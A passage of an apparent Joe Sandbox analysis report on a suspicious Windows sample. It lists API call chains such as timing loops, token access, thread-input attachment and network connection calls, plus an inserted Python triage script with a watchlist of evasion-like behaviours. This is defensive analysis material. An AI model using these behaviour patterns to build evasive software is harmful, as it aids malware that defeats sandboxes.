                                                  • Instruction Fuzzy Hash: 2D116D72501909BFEF224FA49C98EEABF6AFF193A4F041216FA1452110D7329C60DBA1
                                                  APIs
                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 005B3B56
                                                    • Part of subcall function 005B3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 005B3AD2
                                                    • Part of subcall function 005B3AA3: ___AdjustPointer.LIBCMT ref: 005B3AED
                                                  • _UnwindNestedFrames.LIBCMT ref: 005B3B6B
                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 005B3B7C
                                                  • CallCatchBlock.LIBVCRUNTIME ref: 005B3BA4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                  • String ID:
                                                  • API String ID: 737400349-0
                                                  • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                  • Instruction ID: 2f23d474ebab65d64d30da74804694ecf949dde6696eddbcbedd89c89231fcff
                                                  • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                  • Instruction Fuzzy Hash: 9A01E932100149BBDF126E95CC4AEEB7F69FF98754F054014FE4866121D732E961EBA0
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,005913C6,00000000,00000000,?,005C301A,005913C6,00000000,00000000,00000000,?,005C328B,00000006,FlsSetValue), ref: 005C30A5
                                                  • GetLastError.KERNEL32(?,005C301A,005913C6,00000000,00000000,00000000,?,005C328B,00000006,FlsSetValue,00632290,FlsSetValue,00000000,00000364,?,005C2E46), ref: 005C30B1
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,005C301A,005913C6,00000000,00000000,00000000,?,005C328B,00000006,FlsSetValue,00632290,FlsSetValue,00000000), ref: 005C30BF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3177248105-0
                                                  • Opcode ID: 7bfce9cf4d3ecc1923ce227a221c9d1061b9e3f60b62534ea86e0daaaa541db9
                                                  • Instruction ID: 65381fd0f120fa1c347cf518ab11a98cfe0e9bd8170ad2c9cb09fdb8352332ae
                                                  • Opcode Fuzzy Hash: 7bfce9cf4d3ecc1923ce227a221c9d1061b9e3f60b62534ea86e0daaaa541db9
                                                  • Instruction Fuzzy Hash: 8501B537301626AFC7314AA8AC48E677F99BF05771B108628E906F7150D721D90586D0
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 005F747F
                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 005F7497
                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 005F74AC
                                                  • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 005F74CA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Type$Register$FileLoadModuleNameUser
                                                  • String ID:
                                                  • API String ID: 1352324309-0
                                                  • Opcode ID: 1de0a920fe381a32726932cb3a8228cb21dc4ffe3d46a91314af9f5f2aeea7bb
                                                  • Instruction ID: a0246b82d66012af498ca36148ce40cf0770de782ac349330ec8156920821fea
                                                  • Opcode Fuzzy Hash: 1de0a920fe381a32726932cb3a8228cb21dc4ffe3d46a91314af9f5f2aeea7bb
                                                  • Instruction Fuzzy Hash: D71179B1205719ABEB209F14EC0DFA67FF8FB08B10F108569A626D7191D7B4E904DBA1
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,005FACD3,?,00008000), ref: 005FB0C4
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,005FACD3,?,00008000), ref: 005FB0E9
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,005FACD3,?,00008000), ref: 005FB0F3
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,005FACD3,?,00008000), ref: 005FB126
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CounterPerformanceQuerySleep
                                                  • String ID:
                                                  • API String ID: 2875609808-0
                                                  • Opcode ID: ba9698f83370d60851b9ee6e35391369987eb2fa954fecc054cf63cb628aee30
                                                  • Instruction ID: 0c1148760bd87494e111936aab206b556ad5a8dce5cae63e6a46e12e2a24b6ac
                                                  • Opcode Fuzzy Hash: ba9698f83370d60851b9ee6e35391369987eb2fa954fecc054cf63cb628aee30
                                                  • Instruction Fuzzy Hash: D6117930C00A2DEBEF10AFA4E969AFEBF78FF09321F004486DA41B2281CB345651CB51
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 005F2DC5
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 005F2DD6
                                                  • GetCurrentThreadId.KERNEL32 ref: 005F2DDD
                                                  • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 005F2DE4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                  • String ID:
                                                  • API String ID: 2710830443-0
                                                  • Opcode ID: 6a5de6b60e7ec05e2ea6ef1c3f87d71a74bb8b767c87a400161bfd17b50a90a9
                                                  • Instruction ID: 569ed9e500a43f7d8271deda644f0ff55ac45d48f9014991f21869b903a9d7b4
                                                  • Opcode Fuzzy Hash: 6a5de6b60e7ec05e2ea6ef1c3f87d71a74bb8b767c87a400161bfd17b50a90a9
                                                  • Instruction Fuzzy Hash: 5FE06DB1101A287BE7301B629C0EEFB7E6EFB42BB1F401115B205D50809AA88842D6B0
                                                  APIs
                                                    • Part of subcall function 005A9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 005A9693
                                                    • Part of subcall function 005A9639: SelectObject.GDI32(?,00000000), ref: 005A96A2
                                                    • Part of subcall function 005A9639: BeginPath.GDI32(?), ref: 005A96B9
                                                    • Part of subcall function 005A9639: SelectObject.GDI32(?,00000000), ref: 005A96E2
                                                  • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00628887
                                                  • LineTo.GDI32(?,?,?), ref: 00628894
                                                  • EndPath.GDI32(?), ref: 006288A4
                                                  • StrokePath.GDI32(?), ref: 006288B2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                  • String ID:
                                                  • API String ID: 1539411459-0
                                                  • Opcode ID: 06be0d764ea063b8037840cd976a4cab5d21286500c4650511411009784376ba
                                                  • Instruction ID: 9095567f17651fb9c7ae3f316e06927b8b2d0c7313caefd6f44e43991c40f25b
                                                  • Opcode Fuzzy Hash: 06be0d764ea063b8037840cd976a4cab5d21286500c4650511411009784376ba
                                                  • Instruction Fuzzy Hash: 50F05435041969FAEB225F94AC0DFCE3F5A6F06320F048100FA11651E1C7B55511CFE5
                                                  APIs
                                                  • GetSysColor.USER32(00000008), ref: 005A98CC
                                                  • SetTextColor.GDI32(?,?), ref: 005A98D6
                                                  • SetBkMode.GDI32(?,00000001), ref: 005A98E9
                                                  • GetStockObject.GDI32(00000005), ref: 005A98F1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Color$ModeObjectStockText
                                                  • String ID:
                                                  • API String ID: 4037423528-0
                                                  • Opcode ID: 723940cbcba8cdac05430562b9d66b982e341e1d3f0fb1dbe6460f8972429fc2
                                                  • Instruction ID: 7aaa9e510675ab8198d742ecd5b660efcca51c51b6ac6a74207a7874a57870e0
                                                  • Opcode Fuzzy Hash: 723940cbcba8cdac05430562b9d66b982e341e1d3f0fb1dbe6460f8972429fc2
                                                  • Instruction Fuzzy Hash: A4E06531244A94AEDB315B79AC0DBDD3F12BB16336F049219F6F5540E1C37146519B11
                                                  APIs
                                                  • GetCurrentThread.KERNEL32 ref: 005F1634
                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,005F11D9), ref: 005F163B
                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,005F11D9), ref: 005F1648
                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,005F11D9), ref: 005F164F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CurrentOpenProcessThreadToken
                                                  • String ID:
                                                  • API String ID: 3974789173-0
                                                  • Opcode ID: 61f3ec583aae8a305f4d47368f699872c630031e996917c5dc11d8e78d4b1ca4
                                                  • Instruction ID: 79c233b10217a31db921fa0df345398200dd72f7eadbdb90cbe526f3ca3a177a
                                                  • Opcode Fuzzy Hash: 61f3ec583aae8a305f4d47368f699872c630031e996917c5dc11d8e78d4b1ca4
                                                  • Instruction Fuzzy Hash: FBE08631602A11DBD7301FA09D0DF9A3F7DBF447A1F145808F345CA080D6384442C758
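A report of this size carries thousands of per-function records in the layout shown above, and reading them one by one for the API chains that matter (timing loops, token handles, thread-input attachment) is slow. The Python below is an added example for this page, not Joe Sandbox code: it parses the "APIs", "Memory Dump Source" and "Similarity" bullets into records and flags any record whose API set covers a watchlist entry. SAMPLE is constructed from three records on this page with the "Associated" dump lines left out; the WATCHLIST labels and API combinations are assumptions to tune for your own triage.

```python
"""Parse the per-function records of a Joe Sandbox report (the 'APIs',
'Memory Dump Source' and 'Similarity' bullet blocks) and flag API chains
worth a closer look.

Added example for this page; it is not Joe Sandbox code.  SAMPLE is
constructed from three records on this page (the 'Associated' dump lines
are left out for brevity).  WATCHLIST is an assumption: the labels and the
API combinations are a starting point for triage, not a detection rule."""
import re
from dataclasses import dataclass, field

# One API bullet, in any of the forms the report uses:
#   • GetLastError.KERNEL32 ref: 005BD224
#   • CreateThread.KERNEL32(00000000,?,005BCFF9,00000000,00000004,00000000), ref: 005BD218
#   • Part of subcall function 005B3AA3: ___AdjustPointer.LIBCMT ref: 005B3AED
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[\w:]+)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)
# Any other "• Key: value" bullet (Opcode ID, API String ID, Source File, ...).
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str              # address of the call site inside the dump
    subcall_of: str = ""  # set when the call is reached through a sub-function


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    @property
    def api_names(self) -> set:
        return {a.name for a in self.apis}

    @property
    def opcode_id(self) -> str:
        return self.fields.get("Opcode ID", "")


def parse_records(text: str) -> list:
    """Start a new record at every 'APIs' heading; parse the bullets under it."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue  # section headings, and any preamble before the first record
        m = API_RE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            current.apis.append(ApiCall(m["name"], m["mod"], args, m["ref"], m["sub"] or ""))
            continue
        m = FIELD_RE.match(line)
        if m:
            current.fields[m["key"]] = m["val"].strip()
    return records


# Assumed watchlist: a record is flagged when its API set contains every API
# named in an entry (a necessary, not sufficient, sign of the behaviour).
WATCHLIST = {
    "execution-timing check": {"QueryPerformanceCounter", "Sleep"},
    "token inspection": {"OpenProcessToken", "OpenThreadToken"},
    "cross-thread input attach": {"AttachThreadInput", "GetWindowThreadProcessId"},
}


def flag_records(records, watchlist=WATCHLIST) -> list:
    """Return (label, opcode_id, sorted API names) for every watchlist hit."""
    hits = []
    for rec in records:
        for label, needed in watchlist.items():
            if needed <= rec.api_names:
                hits.append((label, rec.opcode_id, sorted(rec.api_names)))
    return hits


SAMPLE = """\
APIs
• GetCurrentThread.KERNEL32 ref: 005F1634
• OpenThreadToken.ADVAPI32(00000000,?,?,?,005F11D9), ref: 005F163B
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,005F11D9), ref: 005F1648
• OpenProcessToken.ADVAPI32(00000000,?,?,?,005F11D9), ref: 005F164F
Memory Dump Source
• Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
Similarity
• API ID: CurrentOpenProcessThreadToken
• String ID:
• API String ID: 3974789173-0
• Opcode ID: 61f3ec583aae8a305f4d47368f699872c630031e996917c5dc11d8e78d4b1ca4
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,005FACD3,?,00008000), ref: 005FB0C4
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,005FACD3,?,00008000), ref: 005FB0E9
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,005FACD3,?,00008000), ref: 005FB0F3
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,005FACD3,?,00008000), ref: 005FB126
Similarity
• API String ID: 2875609808-0
• Opcode ID: ba9698f83370d60851b9ee6e35391369987eb2fa954fecc054cf63cb628aee30
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 005B3B56
  • Part of subcall function 005B3AA3: ___AdjustPointer.LIBCMT ref: 005B3AED
• _UnwindNestedFrames.LIBCMT ref: 005B3B6B
• CallCatchBlock.LIBVCRUNTIME ref: 005B3BA4
Similarity
• API String ID: 737400349-0
• Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
"""

if __name__ == "__main__":
    for label, opcode_id, names in flag_records(parse_records(SAMPLE)):
        print(f"{label:26} {opcode_id[:16]}  {', '.join(names)}")
```

Feed the whole report text to `parse_records` instead of SAMPLE to cover every function; the Opcode ID in each hit is the key to match back to the record, and `ref` gives the call-site address to open in the dump. The watchlist is deliberately a set test rather than an ordered match, so records that reach an API through a sub-function (the "Part of subcall function" bullets) are still counted.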
                                                  APIs
                                                  • GetDesktopWindow.USER32 ref: 005ED858
                                                  • GetDC.USER32(00000000), ref: 005ED862
                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 005ED882
                                                  • ReleaseDC.USER32(?), ref: 005ED8A3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                  • String ID:
                                                  • API String ID: 2889604237-0
                                                  • Opcode ID: b39f0831727bf9809c0a739d3a53d4e34956402db496e6841202269bf2681d18
                                                  • Instruction ID: 19f16397ae64d1a5dc4b0538880fd634d14b67b412e6657f6bbe85ae46afcdef
                                                  • Opcode Fuzzy Hash: b39f0831727bf9809c0a739d3a53d4e34956402db496e6841202269bf2681d18
                                                  • Instruction Fuzzy Hash: F6E01AB1800605DFCF51AFA0D80C66DBFB2FB08720F109409F846E7250D7384902AF50
                                                  APIs
                                                  • GetDesktopWindow.USER32 ref: 005ED86C
                                                  • GetDC.USER32(00000000), ref: 005ED876
                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 005ED882
                                                  • ReleaseDC.USER32(?), ref: 005ED8A3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                  • String ID:
                                                  • API String ID: 2889604237-0
                                                  • Opcode ID: d81591147b05d797af840e475a83c09f1f7a17cf9ea378894c4536bac82544c6
                                                  • Instruction ID: f46251221d0e9f1b929719cf6a2106348e4ecebeaf2abe50fa48844ad00b9fa8
                                                  • Opcode Fuzzy Hash: d81591147b05d797af840e475a83c09f1f7a17cf9ea378894c4536bac82544c6
                                                  • Instruction Fuzzy Hash: B2E09A75C00605DFCF61AFA0D80C66DBFB6FB48721B149449F94AE7250D73959029F50
APIs
  • Part of subcall function 00597620: _wcslen.LIBCMT ref: 00597625
• WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00604ED4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
Similarity
• API ID: Connection_wcslen
• String ID: *$LPT
• API String ID: 1725874428-3443410124
APIs
• __startOneArgErrorHandling.LIBCMT ref: 005BE30D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
APIs
• CharUpperBuffW.USER32(005E569E,00000000,?,0062CC08,?,00000000,00000000), ref: 006178DD
  • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
• CharUpperBuffW.USER32(005E569E,00000000,?,0062CC08,00000000,?,00000000,00000000), ref: 0061783B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
Similarity
• API ID: BuffCharUpper$_wcslen
• String ID: <se
• API String ID: 3544283678-3959060996
Strings
Memory Dump Source
• Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
Similarity
• API ID:
• String ID: #
• API String ID: 0-1885708031
APIs
• Sleep.KERNEL32(00000000), ref: 005AF2A2
• GlobalMemoryStatusEx.KERNEL32(?), ref: 005AF2BB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
APIs
• CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 006157E0
• _wcslen.LIBCMT ref: 006157EC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
Similarity
• API ID: BuffCharUpper_wcslen
• String ID: CALLARGARRAY
• API String ID: 157775604-1150593374
APIs
• _wcslen.LIBCMT ref: 0060D130
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0060D13A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
Similarity
• API ID: CrackInternet_wcslen
• String ID: |
• API String ID: 596671847-2343686810
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 00623621
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0062365C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 0062461F
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00624634
Strings
Memory Dump Source
• Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
APIs
